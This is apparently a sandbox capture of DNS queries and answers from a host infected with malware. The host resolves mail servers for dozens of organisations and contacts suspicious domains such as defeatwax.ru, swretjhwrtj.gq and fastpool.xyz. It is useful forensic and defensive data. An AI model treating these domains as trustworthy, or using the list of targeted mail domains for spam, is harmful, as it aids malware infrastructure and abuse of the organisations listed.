Aug 24, 2021 08:48:09.866084099 CEST	192.168.2.7	8.8.8.8	0xd971	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:09.868391991 CEST	192.168.2.7	8.8.8.8	0x1964	Standard query (0)	kennametal.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:09.925410986 CEST	192.168.2.7	8.8.8.8	0xb382	Standard query (0)	mxb-002a1b02.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.105523109 CEST	192.168.2.7	8.8.8.8	0x96cf	Standard query (0)	m.youtube.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.163880110 CEST	192.168.2.7	8.8.8.8	0xbf23	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.387548923 CEST	192.168.2.7	8.8.8.8	0xd1a8	Standard query (0)	unk.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.465331078 CEST	192.168.2.7	8.8.8.8	0xb8f5	Standard query (0)	mxa-00246402.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.485094070 CEST	192.168.2.7	8.8.8.8	0x9599	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.533283949 CEST	192.168.2.7	8.8.8.8	0x10b5	Standard query (0)	mfgservs.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:10.744853020 CEST	192.168.2.7	8.8.8.8	0xbf72	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:10.757847071 CEST	192.168.2.7	8.8.8.8	0xce52	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.039514065 CEST	192.168.2.7	8.8.8.8	0x7b4c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.064080000 CEST	192.168.2.7	8.8.8.8	0x6a3c	Standard query (0)	spectrum-health.org	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.230070114 CEST	192.168.2.7	8.8.8.8	0x74a7	Standard query (0)	mxa-001e1201.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.584208965 CEST	192.168.2.7	8.8.8.8	0x6980	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.594069958 CEST	192.168.2.7	8.8.8.8	0x6606	Standard query (0)	aigag.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.702613115 CEST	192.168.2.7	8.8.8.8	0xebb6	Standard query (0)	am1mxi02.aig.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.719419003 CEST	192.168.2.7	8.8.8.8	0xae0f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.821831942 CEST	192.168.2.7	8.8.8.8	0x6345	Standard query (0)	aig.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.881593943 CEST	192.168.2.7	8.8.8.8	0x59f5	Standard query (0)	am2mxi05.aig.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.161679983 CEST	192.168.2.7	8.8.8.8	0x31b3	Standard query (0)	stanford.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.252526045 CEST	192.168.2.7	8.8.8.8	0x210b	Standard query (0)	mxb-00000d03.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.315445900 CEST	192.168.2.7	8.8.8.8	0xfe46	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.343657970 CEST	192.168.2.7	8.8.8.8	0xc606	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.575552940 CEST	192.168.2.7	8.8.8.8	0xbeb6	Standard query (0)	netzero.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.575998068 CEST	192.168.2.7	8.8.8.8	0xb3e	Standard query (0)	www.instagram.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.649391890 CEST	192.168.2.7	8.8.8.8	0x920e	Standard query (0)	mx.vgs.untd.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.819562912 CEST	192.168.2.7	8.8.8.8	0x4cbb	Standard query (0)	mywebtimes.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.997320890 CEST	192.168.2.7	8.8.8.8	0x7376	Standard query (0)	mxa-005be101.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.023379087 CEST	192.168.2.7	8.8.8.8	0x6af1	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.142889023 CEST	192.168.2.7	8.8.8.8	0xd49c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.541888952 CEST	192.168.2.7	8.8.8.8	0x4901	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.570244074 CEST	192.168.2.7	8.8.8.8	0xc46b	Standard query (0)	dg.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:13.661128044 CEST	192.168.2.7	8.8.8.8	0x63cf	Standard query (0)	mxa-00155702.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.673722029 CEST	192.168.2.7	8.8.8.8	0x6709	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.156769991 CEST	192.168.2.7	8.8.8.8	0x1a7d	Standard query (0)	wellsfargo.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:14.218213081 CEST	192.168.2.7	8.8.8.8	0xe5ba	Standard query (0)	mxb-00004003.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.220727921 CEST	192.168.2.7	8.8.8.8	0xdc31	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.220829964 CEST	192.168.2.7	8.8.8.8	0x7f24	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.411966085 CEST	192.168.2.7	8.8.8.8	0x2767	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.669918060 CEST	192.168.2.7	8.8.8.8	0xba6d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.865398884 CEST	192.168.2.7	8.8.8.8	0x6f82	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.181423903 CEST	192.168.2.7	8.8.8.8	0xb0c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.399323940 CEST	192.168.2.7	8.8.8.8	0xa352	Standard query (0)	cc.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.476702929 CEST	192.168.2.7	8.8.8.8	0xc031	Standard query (0)	mxa-00262c01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.486115932 CEST	192.168.2.7	8.8.8.8	0x8889	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.720777988 CEST	192.168.2.7	8.8.8.8	0xaf23	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.813241005 CEST	192.168.2.7	8.8.8.8	0xcced	Standard query (0)	peoplepc.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.886044979 CEST	192.168.2.7	8.8.8.8	0x9676	Standard query (0)	mx01.oxsus-vadesecure.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.085262060 CEST	192.168.2.7	8.8.8.8	0xfec4	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.103138924 CEST	192.168.2.7	8.8.8.8	0xf89c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.348051071 CEST	192.168.2.7	8.8.8.8	0xa080	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.355648994 CEST	192.168.2.7	8.8.8.8	0xe95f	Standard query (0)	mx0.charter.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.673012972 CEST	192.168.2.7	8.8.8.8	0xf430	Standard query (0)	lycos.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:16.757494926 CEST	192.168.2.7	8.8.8.8	0xe9ec	Standard query (0)	mx.lycos.com.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.770612001 CEST	192.168.2.7	8.8.8.8	0x8d18	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.868834019 CEST	192.168.2.7	8.8.8.8	0x6d74	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:17.208261013 CEST	192.168.2.7	8.8.8.8	0x9ccd	Standard query (0)	rediff.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.346602917 CEST	192.168.2.7	8.8.8.8	0xf5ac	Standard query (0)	a1future.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.836889982 CEST	192.168.2.7	8.8.8.8	0xc0e4	Standard query (0)	alt2.aspmx.l.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:17.838850021 CEST	192.168.2.7	8.8.8.8	0xf3d7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:18.471353054 CEST	192.168.2.7	8.8.8.8	0xdf56	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:18.472073078 CEST	192.168.2.7	8.8.8.8	0x5ef8	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:19.123662949 CEST	192.168.2.7	8.8.8.8	0xabad	Standard query (0)	almayagroup.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:19.287771940 CEST	192.168.2.7	8.8.8.8	0xd075	Standard query (0)	smtp.almaya.ae	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:19.465039015 CEST	192.168.2.7	8.8.8.8	0x686d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:20.887794971 CEST	192.168.2.7	8.8.8.8	0x2ed0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.404436111 CEST	192.168.2.7	8.8.8.8	0xa0ca	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.404474974 CEST	192.168.2.7	8.8.8.8	0x8fd4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.698936939 CEST	192.168.2.7	8.8.8.8	0xc773	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.083018064 CEST	192.168.2.7	8.8.8.8	0x7dec	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.306983948 CEST	192.168.2.7	8.8.8.8	0x3138	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.584141970 CEST	192.168.2.7	8.8.8.8	0x3ad6	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.924045086 CEST	192.168.2.7	8.8.8.8	0xcada	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.937241077 CEST	192.168.2.7	8.8.8.8	0x15de	Standard query (0)	fiu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:23.120373964 CEST	192.168.2.7	8.8.8.8	0xb7a4	Standard query (0)	mxa-000c9b01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.202584028 CEST	192.168.2.7	8.8.8.8	0x7174	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.430375099 CEST	192.168.2.7	8.8.8.8	0xcc9f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.606734037 CEST	192.168.2.7	8.8.8.8	0xea14	Standard query (0)	mxa-000c9b01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.715203047 CEST	192.168.2.7	8.8.8.8	0x738f	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.717617989 CEST	192.168.2.7	8.8.8.8	0xaf9	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.942255974 CEST	192.168.2.7	8.8.8.8	0x9f66	Standard query (0)	fairview.org	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:23.994752884 CEST	192.168.2.7	8.8.8.8	0xa6ad	Standard query (0)	mxa-0005f101.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.357857943 CEST	192.168.2.7	8.8.8.8	0x435e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.544178963 CEST	192.168.2.7	8.8.8.8	0xddc1	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.590845108 CEST	192.168.2.7	8.8.8.8	0xb4fd	Standard query (0)	my.gcu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:24.676736116 CEST	192.168.2.7	8.8.8.8	0xa408	Standard query (0)	mxa-005dfb01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.921580076 CEST	192.168.2.7	8.8.8.8	0x63a3	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.091562986 CEST	192.168.2.7	8.8.8.8	0x908	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.169748068 CEST	192.168.2.7	8.8.8.8	0x20a2	Standard query (0)	trends.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.305867910 CEST	192.168.2.7	8.8.8.8	0xc96c	Standard query (0)	mxa-0005f101.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.428105116 CEST	192.168.2.7	8.8.8.8	0x947e	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.612881899 CEST	192.168.2.7	8.8.8.8	0xe1e8	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.715383053 CEST	192.168.2.7	8.8.8.8	0xe095	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.796987057 CEST	192.168.2.7	8.8.8.8	0x2261	Standard query (0)	ae.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:25.883907080 CEST	192.168.2.7	8.8.8.8	0x76d7	Standard query (0)	mxa-0017bf01.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.895930052 CEST	192.168.2.7	8.8.8.8	0x1988	Standard query (0)	hotmail.ca	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:25.954981089 CEST	192.168.2.7	8.8.8.8	0xbd4f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.160240889 CEST	192.168.2.7	8.8.8.8	0x9703	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.282202005 CEST	192.168.2.7	8.8.8.8	0xd423	Standard query (0)	trends.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.373648882 CEST	192.168.2.7	8.8.8.8	0x52ec	Standard query (0)	aggiemail.usu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:26.427387953 CEST	192.168.2.7	8.8.8.8	0x7e84	Standard query (0)	ASPMX.L.GOOGLE.COM	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.439846992 CEST	192.168.2.7	8.8.8.8	0xdc53	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.795943022 CEST	192.168.2.7	8.8.8.8	0xd028	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.934576035 CEST	192.168.2.7	8.8.8.8	0x3ee8	Standard query (0)	bellsouth.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.116136074 CEST	192.168.2.7	8.8.8.8	0xad1d	Standard query (0)	mx0a-00191d01.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.128072977 CEST	192.168.2.7	8.8.8.8	0x3db6	Standard query (0)	beta.tricity.wsu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.346900940 CEST	192.168.2.7	8.8.8.8	0x503b	Standard query (0)	mxb-0007b301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.393124104 CEST	192.168.2.7	8.8.8.8	0xe88	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.394237041 CEST	192.168.2.7	8.8.8.8	0x9580	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.573848009 CEST	192.168.2.7	8.8.8.8	0xb6e4	Standard query (0)	epcor.ca	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.746990919 CEST	192.168.2.7	8.8.8.8	0x9544	Standard query (0)	mxb-003d1301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.770092964 CEST	192.168.2.7	8.8.8.8	0xe245	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.811111927 CEST	192.168.2.7	8.8.8.8	0xdc73	Standard query (0)	harborfreight.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:27.888428926 CEST	192.168.2.7	8.8.8.8	0x7f47	Standard query (0)	mxa-00515601.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:27.939105034 CEST	192.168.2.7	8.8.8.8	0x3b2b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.137923002 CEST	192.168.2.7	8.8.8.8	0xe5a4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.294137955 CEST	192.168.2.7	8.8.8.8	0xdaad	Standard query (0)	harding.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.475513935 CEST	192.168.2.7	8.8.8.8	0xeccd	Standard query (0)	www.instagram.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.488331079 CEST	192.168.2.7	8.8.8.8	0xa530	Standard query (0)	alt1.aspmx.l.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.503595114 CEST	192.168.2.7	8.8.8.8	0x1f6f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.504132032 CEST	192.168.2.7	8.8.8.8	0x90d8	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.504848957 CEST	192.168.2.7	8.8.8.8	0xb5ce	Standard query (0)	nu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:28.585556030 CEST	192.168.2.7	8.8.8.8	0xc9a7	Standard query (0)	mxb-002b4301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.721726894 CEST	192.168.2.7	8.8.8.8	0x8382	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:28.840090036 CEST	192.168.2.7	8.8.8.8	0xba85	Standard query (0)	work.a-poster.info	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.270356894 CEST	192.168.2.7	8.8.8.8	0xe3e5	Standard query (0)	pepboys.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:29.524123907 CEST	192.168.2.7	8.8.8.8	0xcae8	Standard query (0)	mxb-00247301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.536858082 CEST	192.168.2.7	8.8.8.8	0x7018	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.537687063 CEST	192.168.2.7	8.8.8.8	0xeaf4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.722112894 CEST	192.168.2.7	8.8.8.8	0xa950	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:29.806221962 CEST	192.168.2.7	8.8.8.8	0x36a5	Standard query (0)	ucsd.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:30.021198034 CEST	192.168.2.7	8.8.8.8	0x864	Standard query (0)	inbound.ucsd.edu	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.114079952 CEST	192.168.2.7	8.8.8.8	0x27f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.322211027 CEST	192.168.2.7	8.8.8.8	0x3ddf	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:30.412621975 CEST	192.168.2.7	8.8.8.8	0xd6fa	Standard query (0)	uthct.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:30.508426905 CEST	192.168.2.7	8.8.8.8	0x6c21	Standard query (0)	mxb-00270301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:31.095408916 CEST	192.168.2.7	8.8.8.8	0x1e72	Standard query (0)	wsu.edu	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.153666973 CEST	192.168.2.7	8.8.8.8	0x8b32	Standard query (0)	mxa-0007b301.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:31.315609932 CEST	192.168.2.7	8.8.8.8	0xddc6	Standard query (0)	m33access.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.396404982 CEST	192.168.2.7	8.8.8.8	0x9693	Standard query (0)	mx.m33access.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:31.607810974 CEST	192.168.2.7	8.8.8.8	0xc50c	Standard query (0)	redbluffkids.org	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:31.680845976 CEST	192.168.2.7	8.8.8.8	0xfd0e	Standard query (0)	ASPMX.L.GOOGLE.COM	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:32.194891930 CEST	192.168.2.7	8.8.8.8	0x4291	Standard query (0)	highjumpchicago.org	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:32.261037111 CEST	192.168.2.7	8.8.8.8	0x8dd2	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 24, 2021 08:46:30.507035017 CEST	8.8.8.8	192.168.2.7	0x8485	Name error (3)	readinglistforaugust1.xyz	none	none	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:30.561930895 CEST	8.8.8.8	192.168.2.7	0xb346	No error (0)	readinglistforaugust2.xyz		95.213.224.6	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:42.510602951 CEST	8.8.8.8	192.168.2.7	0x2272	No error (0)	readinglistforaugust3.xyz		212.224.105.79	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:54.214710951 CEST	8.8.8.8	192.168.2.7	0xf66b	No error (0)	swretjhwrtj.gq		172.67.216.236	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:54.214710951 CEST	8.8.8.8	192.168.2.7	0xf66b	No error (0)	swretjhwrtj.gq		104.21.86.82	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:56.562426090 CEST	8.8.8.8	192.168.2.7	0x986	No error (0)	eduarroma.tumblr.com		74.114.154.22	A (IP address)	IN (0x0001)
Aug 24, 2021 08:46:56.562426090 CEST	8.8.8.8	192.168.2.7	0x986	No error (0)	eduarroma.tumblr.com		74.114.154.18	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:13.518866062 CEST	8.8.8.8	192.168.2.7	0x7195	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:47:13.566236973 CEST	8.8.8.8	192.168.2.7	0xe4ba	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:47:16.201859951 CEST	8.8.8.8	192.168.2.7	0xcd	No error (0)	readinglistforaugust3.xyz		212.224.105.79	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:37.064794064 CEST	8.8.8.8	192.168.2.7	0xa2ce	No error (0)	defeatwax.ru		193.56.146.188	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:46.424907923 CEST	8.8.8.8	192.168.2.7	0x750e	No error (0)	telete.in		195.201.225.248	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.119937897 CEST	8.8.8.8	192.168.2.7	0x4901	No error (0)	hotmail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:49.175241947 CEST	8.8.8.8	192.168.2.7	0x2d63	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.175241947 CEST	8.8.8.8	192.168.2.7	0x2d63	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.235085011 CEST	8.8.8.8	192.168.2.7	0x6eb5	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.297125101 CEST	8.8.8.8	192.168.2.7	0x5ee1	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.415807962 CEST	8.8.8.8	192.168.2.7	0x5f00	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.493520975 CEST	8.8.8.8	192.168.2.7	0xf7fe	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.540524960 CEST	8.8.8.8	192.168.2.7	0xf1be	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.591239929 CEST	8.8.8.8	192.168.2.7	0x1da4	No error (0)	fastpool.xyz		213.91.128.133	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:49.591520071 CEST	8.8.8.8	192.168.2.7	0xac4	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.182712078 CEST	8.8.8.8	192.168.2.7	0x5d75	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.182712078 CEST	8.8.8.8	192.168.2.7	0x5d75	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.187608004 CEST	8.8.8.8	192.168.2.7	0xa32e	No error (0)	msn.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:50.265067101 CEST	8.8.8.8	192.168.2.7	0xf84b	No error (0)	msn-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.265067101 CEST	8.8.8.8	192.168.2.7	0xf84b	No error (0)	msn-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.270613909 CEST	8.8.8.8	192.168.2.7	0x9bac	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
